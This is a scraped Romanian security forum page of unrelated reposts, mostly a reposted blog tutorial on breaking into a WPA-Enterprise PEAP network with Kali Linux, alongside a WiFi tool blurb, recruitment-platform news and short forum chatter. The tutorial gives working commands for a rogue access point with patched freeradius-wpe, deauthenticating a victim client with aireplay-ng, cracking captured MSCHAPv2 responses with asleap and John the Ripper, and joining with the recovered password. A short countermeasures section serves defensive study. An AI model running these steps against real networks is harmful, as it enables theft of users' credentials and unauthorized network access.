http://www.faravirusi.com/2015/11/15/ashampoo-burning-studio-2016-alternativa-nero-licenta-gratuita/

[h=1]Wifi Channel Picker[/h] find the best channel for your Wifi router Wifi Channel Picker enables you to analyze your Wifi connection and find out which channel will have the least amount of interference from other access point around you. The program can be very useful if your Wifi connected is impacted by interference from other close-by access points, e.g. in an apartment building. When you start Wifi Channel Picker, it will first display a list of all access points that are within reach of your signal. It displays them along with detailed information, including the estimated distance of the access point. You can then select the access point you want to analyze and the program will bring up a short report that suggests the best channel to use for your Wifi access point. XP/Vista/7/8/10 Portable [h=3]Product Details[/h] [TABLE] [TR] [TD=class: title]Publisher[/TD] [TD=class: data]VisionIT [/TD] [TD=class: title]Price [/TD] [TD=class: data]Free [/TD] [/TR] [TR] [TD=class: title]Version[/TD] [TD=class: data]2.0.2.1 [/TD] [TD=class: title]Last updated[/TD] [TD=class: data]Nov 13, 2015[/TD] [/TR] [TR] [TD=class: title]File Size[/TD] [TD=class: data] 104 Kb [/TD] [TD=class: title]Requirements[/TD] [TD=class: data]None[/TD] [/TR] [/TABLE] Sursa: Wifi Channel Picker Freeware - Trusted download and reviews from SnapFiles

[h=1]Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei[/h] de Raluca Abrihan 12 noiembrie 2015 16.50 Agentia interactiva 2Fresh a anuntat lansarea Digitaljob.ro, o platforma de recrutare de nisa, dedicata exclusiv industriei digitale si IT din Romania, in urma unei investitii de 30.000 de euro. Platfoma se adreseaza companiilor si specialistilor care activeaza in domeniul dezvoltarii online, mobile, software, gaming, precum si advertising sau marketing. In prezent, companiile isi pot anunta gratuit pozitiile disponibile pe Digitaljob.ro, urmand cadin primul trimestru lui 2016, platforma sa perceapa un fee din partea companiilor, pentru fiecare job plasat. Aproape 120 de companii au apelat, deja, la serviciile platformei, pentru gasirea candidatilor, sustin reprezentantii Digitaljob.ro. In ceea ce priveste numarul de anunturi publicate pana in prezent, acesta se ridica la 200, generand un numar total de 900 de aplicanti.In acest moment, pe Digitaljob.ro sunt active peste 100 de anunturi, iar cele mai multe dintre acestea, peste 59%, sunt pentru programatori, urmate de designeri, cu 30% din total, marketeri - 7% si management - aproximativ 4%. In urmatoarele 6 luni, reprezentantii platformei urmaresc atragerea mai multor angajatori si cresterea numarului de locuri de munca active cu pana la 150%. Ideea de a lansa o platforma de nisa, dedicata acestei industrii, a venit in urma mai multor incercari esuate ale agentiei 2Fresh de a gasi angajatii potriviti prin metodele existente de recrutare, pe platformele generaliste de joburi si cu ajutorul social media, conform declaratiilor lui Marius Dascalu, Stratey and Creative Director 2Fresh. Sursa: Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei - Idei - StartupCafe.ro

Monday, March 3, 2014 Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part II By Tony Lee Introduction In our previous articles we used TP-Link’s TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, WPA (Pre-Shared Key) PSK network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup. WEP: http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html WPA-PSK:SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-PSK Hidden SSID: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - Hidden SSID MAC Filtering: http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-MACFiltering.html WPA-Enterprise Part I:SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP). Figure 1: Our setup Consult our previous article WEPfor the following topics as they are omitted from this article due to similarity: Equipment Hardware Software [*]Tips and tricks Version of Workstation Screen Resolution Simple Text Editor [*]Connecting the USB Device Outline Preparation WPA-Enterprise Refresher Discovery Attack PEAP and EAP-TLS Explained Install the Software freeradius-server-2.1.12 freeradius-wpe patch hostapd v2.0 [*]Start the RADIUS Server [*]Start the Fake AP [*]Deauthenticate the Client [*]Brute-force the Credentials MSCHAPv2 EAPMD5 [*]Connect [*]Countermeasures [*]Conclusion Preparation NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time. [TABLE] [TR] [TD]root@kali:~# service network-manager stop [ ok ] Stopping network connection manager: NetworkManager.[/TD] [/TR] [/TABLE] WPA-Enterprise Refresher We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn’t want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turn over. So what is the alternative? WPA-Enterprise of course! WPA-Enterprise is ideal for large organizations because it does not use a single shared key in which all users use to connect to the wireless network. Each user has their own account (usually username and password) that they use to authenticate to the network. Best of all these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through. The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double edge sword though as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip non-bolded as they are present to be complete): LEAP - Lightweight EAP Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol. “[P]roprietary wireless LAN authentication method developed by Cisco Systems” “LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected.” “Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking.” Source: http://en.wikipedia.org/wiki/Lightweight_Extensible_Authentication_Protocol [*]EAP-MD5 Credentials are sent without SSL protection, but MD5 hashed. “It offers minimal security; the MD5 hash function is vulnerable to dictionary attacks, and does not support key generation, which makes it unsuitable for use with dynamic WEP, or WPA/WPA2 enterprise.” Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-MD5 [*]PEAP - (Protected EAP) “[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel” “Jointly developed by Cisco Systems, Microsoft, and RSA Security.” “Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server” Source: http://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol Most common inner authentication protocols are MSCHAPv2 and GTC (tokens) [*]EAP-TLS - (EAP-Transport Layer Security) “ses PKI to secure communication to a RADIUS authentication server or another type of authentication server.” “Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software.” Requires client-side certificate, which prevents many organizations from using it. Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-TLS [*]EAP-FAST - (Flexible Authentication via Secure Tunneling) “[A] protocol proposal by Cisco Systems as a replacement for LEAP.” “Use of server certificates is optional in EAP-FAST.” “EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified.” “When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials.” Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-FAST Discovery (kismet) In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides. [TABLE] [TR] [TD]root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork ESSID:"CorpNetwork" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s Mode:Master Extra:tsf=000000000d674180 Extra: Last beacon: 96ms ago IE: Unknown: 000B436F72704E6574776F726B IE: Unknown: 010482840B16 IE: Unknown: 030101 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : TKIP Pairwise Ciphers (2) : CCMP TKIP Authentication Suites (1) : 802.1x --snip--[/TD] [/TR] [/TABLE] Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let’s capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into “Monitor” mode. [TABLE] [TR] [TD]root@kali:~# airmon-ng start wlan0[/TD] [/TR] [/TABLE] We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we are obtain this information, we focus our collection efforts by locking onto the channel and AP. [TABLE] [TR] [TD]Syntax: airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT> Key: -c = Channel that the AP is on --bssid = MAC address of the AP -w = Prefix of the file name that you want to write data to <INT> = Interface we will be capturing on Attack: airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0[/TD] [/TR] [/TABLE] Figure 2: airodump-ng is detecting wireless networks From this screenshot, we will note a few items for the attack later: [TABLE] [TR] [TD]Variable name = Description: Value ============================== $ESSID = ESSID: CorpNetwork $CH = Channel: 1 $AP = AP MAC: A0:F3:C1:0C:B6:46 $VM = Victim user MAC: 24:77:03:8C:D3:44 [/TD] [/TR] [/TABLE] Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark’s “Statistics -> Protocol Hierarchy” feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type “eapol” in the display filters. Figure 3: Wireshark Protocol Hierarchy feature After applying the filters, we see that the EAP type is Protected EAP (PEAP). Figure 4: EAP type is PEAP Attack Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS. PEAP and EAP-TLS Explained Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP. The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server. Figure 5: Normal operation in which client is connected to legitimate network In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attackers RADIUS server. Figure 6: After wireless client is deauthenticated, the client will hopefully connect to our fake access point This should yield the information necessary to begin a brute force attack of the credentials. Let’s look at the detailed steps that are required in getting this setup in our environment. Our steps taken with this setup are outlined below: Install the Software Start the RADIUS Server Start the Fake AP Deauthenticate the Client Brute-force the Credentials Install the Software This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is: freeradius-server-2.1.12 freeradius-wpe (Wireless Pwnage Edition) patch hostapd v2.0 We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root: [TABLE] [TR] [TD]wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2 wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch tar -jxvf freeradius-server-2.1.12.tar.bz2 cd freeradius-server-2.1.12 patch -p1 < ../freeradius-wpe.patch ./configure make make install ldconfig[/TD] [/TR] [/TABLE] Explanation of the commands above: The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application. After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see “FreeRADIUS-WPE” in the banner. [TABLE] [TR] [TD]root@kali:~/freeradius-server-2.1.12# radiusd -v radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02 --snip--[/TD] [/TR] [/TABLE] The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure: [TABLE] [TR] [TD]wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz tar -zxvf hostapd-2.0.tar.gz cd hostapd-2.0/ cd hostapd/ cp defconfig .config apt-get install libnl-dev apt-get update apt-get install libssl-dev make && make install[/TD] [/TR] [/TABLE] Explanation of the commands above: The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab necessary libraries and finally the last command compiles and installs the binaries. After all the software is installed, we can start the attack. Start the RADIUS Server We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass through authentication. The file we needed to edit is: /usr/local/etc/raddb/modules/mschap We had to make sure the line “with_ntdomain_hack” was set to yes and uncommented as shown below: [TABLE] [TR] [TD] # Windows sends us a username in the form of # DOMAIN\user, but sends the challenge response # based on only the user portion. This hack # corrects for that incorrect behavior. # with_ntdomain_hack = yes[/TD] [/TR] [/TABLE] When that line is commented we received the following error message: “Could not recover last 2 bytes of hash from the challenge/response.” Figure 7: Error message when “with_ntdomain_hack” was not set to yes Now that we have the configuration file modified, we should be ready to start radiusd. [TABLE] [TR] [TD]Syntax: radiusd -X Key: -X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".[/TD] [/TR] [/TABLE] The screenshot below shows the expected behavior of running “radiusd -X”. The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step. Figure 8: radiusd is ready to process requests Start the Fake AP If we want to trick the victim to connect to our setup, we need a fake access point. This can be a hardware based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file. Feel free to use our example file below to get you started: [TABLE] [TR] [TD]interface=wlan0 driver=nl80211 ssid=CorpNetwork logger_stdout=-1 logger_stdout_level=0 dump_file=/tmp/hostapd.dump ieee8021x=1 eapol_key_index_workaround=0 own_ip_addr=127.0.0.1 auth_server_addr=127.0.0.1 auth_server_port=1812 auth_server_shared_secret=testing123 wpa=2 wpa_key_mgmt=WPA-EAP channel=1 wpa_pairwise=TKIP CCMP[/TD] [/TR] [/TABLE] After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below: [TABLE] [TR] [TD]Syntax: hostapd <configuration file> Syntax: hostapd ./hostapd.conf [/TD] [/TR] [/TABLE] After running hostapd, your screen should look like the following screenshot: Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client Deauthenticate the Client Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them to connect to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials. In our example, the victim information found during the discovery phase is summarized below: [TABLE] [TR] [TD]Variable name = Description: Value ============================== $ESSID = ESSID: CorpNetwork $CH = Channel: 1 $AP = AP MAC: A0:F3:C1:0C:B6:46 $VM = Victim user MAC: 24:77:03:8C:D3:44 [/TD] [/TR] [/TABLE] Now, let’s knock the victim off the wireless network using aireplay’s deauthentication attack. [TABLE] [TR] [TD]Syntax: aireplay-ng -0 25 -a <AP> -c < VICTIM_MAC> <INT> Key: -0 = (same as --deauth) deauthentication attack -a = MAC address of the AP -c = Victim MAC address <INT> = Interface we will be attacking from Attack: aireplay-ng -0 25 -a $AP -c $VM mon0[/TD] [/TR] [/TABLE] If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file: [TABLE] [TR] [TD]root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log[/TD] [/TR] [/TABLE] The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user’s password shown in the next section. Figure 10: The user’s authentication will fail, but we will have the challenge/response needed to crack the password Brute-force the Credentials Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start as it is almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below: [TABLE] [TR] [TD]root@kali:/usr/share/wordlists# ls rockyou.txt.gz root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz root@kali:/usr/share/wordlists# ls rockyou.txt root@kali:/usr/share/wordlists# wc -l rockyou.txt 14344392 rockyou.txt[/TD] [/TR] [/TABLE] MSCHAPv2 Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright’s asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W): [TABLE] [TR] [TD]Syntax: root@kali:~# asleap asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com> asleap: Must supply an interface with -i, or a stored file with -r Usage: asleap [options] -r Read from a libpcap file -i Interface to capture on -f Dictionary file with NT hashes -n Index file for NT hashes -s Skip the check to make sure authentication was successful -h Output this help information and exit -v Print verbose information (more -v for more verbosity) -V Print program version and exit -C Challenge value in colon-delimited bytes -R Response value in colon-delimited bytes -W ASCII dictionary file (special purpose) Attack: root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt[/TD] [/TR] [/TABLE] The asleap tool is very fast. It found our password of “cheekymonkeyrox” in just seconds because it is present as-is within the rockyou password list. Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords as discussed in previous articles. For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger: [TABLE] [TR] [TD]Generate permutations with JTR: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout Feed JTR permutations into asleap: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE> Example: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -[/TD] [/TR] [/TABLE] EAP-MD5 If the inner authentication protocol is EAP-MD5 use the eapmd5pass tool: [TABLE] [TR] [TD]Syntax: root@kali:~# eapmd5pass eapmd5pass - Dictionary attack against EAP-MD5 Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options] -i <iface> interface name -r <pcapfile> read from a named libpcap file -w <wordfile> use wordfile for possible passwords. -b <bssid> BSSID of target network (default: all) -U <username> Username of EAP-MD5 user. -C <chal> EAP-MD5 challenge value. -R <response> EAP-MD5 response value. -E <eapid> EAP-MD5 response EAP ID value. -v increase verbosity level (max 3) -V version information -h usage information The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means. Attack: root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap[/TD] [/TR] [/TABLE] For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger: [TABLE] [TR] [TD]Generate permutations with JTR: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout Feed JTR permutations into eapmd5pass: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP> Example: /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap[/TD] [/TR] [/TABLE] Connect Now that we have recovered the credentials, we will connect to the AP using the configuration files below: [TABLE] [TR] [TD]Check the status of the card: root@kali:~# iwconfig wlan0 Enter the network information: root@kali:~# iwconfig wlan0 essid "QX3A7" Bring the Interface up: root@kali:~# ifconfig wlan0 up Create wpa_supplicant file: network={ ssid="CorpNetwork" scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP identity="TonyTestUser" password="cheekymonkeyrox" phase1="peaplabel=0" phase2="auth=MSCHAPV2" } Run the wpa_supplicant: root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf Obtain an IP: root@kali:~# dhclient wlan0 Reloading /etc/samba/smb.conf: smbd only. Verify an IP is obtained: root@kali:~# ifconfig wlan0[/TD] [/TR] [/TABLE] Countermeasures Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration. For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CA’s, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below. Figure 12: Wireless client settings for PEAP Conclusion In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated. If you try this with different cards and run into issues, check the following excellent resource: http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues Props Thomas d'Otreppe for the ever critical aircrack-ng software suite Josh Wright and Brad Antoniewicz for great work on freeradius-WPE Josh Wright for asleap and eapmd5pass Jouni Malinen <j@w1.fi> and contributors for hostapd Offensive security group for Kali Linux Dan Dumond for the sanity check and proof read Posted by Tony Lee at 3:00 AM Sursa: http://securitysynapse.blogspot.ro/2014/03/wireless-pentesting-on-cheap-kali-WPAEntPartII.html

Security Hub - The IT Security Professionals Social Network Link: https://securityhub.io/index.php Pareri? Sugestii?

Pe intelesul tuturor: BILETE GRATIS LA DEFCAMP. Link: DefCamp2015 Raffle | Cazacu Bogdan

Atat, Gigi Becali prim ministru!

Violenta?